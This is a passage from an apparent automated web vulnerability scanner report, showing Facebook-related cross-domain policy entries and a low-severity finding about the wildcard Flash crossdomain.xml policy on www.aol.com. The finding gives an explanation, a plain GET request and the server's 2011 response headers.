   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
...[SNIP]...
<allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="external.ak.fbcdn.net" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
...[SNIP]...

6.28. http://www.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:35:51 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1066
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domai